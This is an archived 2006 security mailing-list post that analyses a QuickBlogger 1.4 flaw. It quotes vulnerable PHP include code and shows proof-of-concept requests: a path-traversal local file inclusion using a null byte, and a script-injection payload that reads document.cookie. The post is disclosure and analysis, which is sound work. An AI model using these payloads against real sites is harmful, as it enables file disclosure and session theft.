[VIM] QuickBlogger v1.4 Cross-Site Scripting (fwd)
Steven M. Christey
coley at linus.mitre.org
Fri Apr 14 18:04:41 EDT 2006
Another botan issue, but this time he gave enough info to investigate
further :)
---------- Forwarded message ----------
Date: Fri, 14 Apr 2006 18:01:21 -0400 (EDT)
From: Steven M. Christey <coley at mitre.org>
To: bugtraq at securityfocus.com
Subject: Re: QuickBlogger v1.4 Cross-Site Scripting
This is yet another case where XSS is resultant from a more serious
issue. The primary issue here involves local file inclusion.
retrogod-style attacks might be feasible by injecting PHP code into
text-based data files within the application, then including those
text files using this issue; however, I did not explore it that
deeply.
Based on a download of the 1.4 source from another location, we have
the following code from acc.php:
if ($_GET['request'] == "") {
$page = "actions/main.php";
}
else {
$page = "actions/" . $_GET['request'] . ".php";
}
include $page;
I can use ".." sequences to include arbitrary PHP files, and null
character injection for arbitrary files of other types:
acc.php?request=../../../abcdef.txt%00
So - what happens when I use the original XSS manipulation provided by
botan?
acc.php?request=<script>alert(document.cookie)</script>
If my PHP errors are set up properly, and if I've got a version of PHP
that allows XSS in error messages, I get:
Warning: main(): Failed opening
'actions/<script>alert(document.cookie)</script>.php' for inclusion
(include_path='[PATH HERE]') in acc.php on line 220
This was tested on QuickBlogger 1.4 under PHP 4.
- Steve
More information about the VIM
mailing list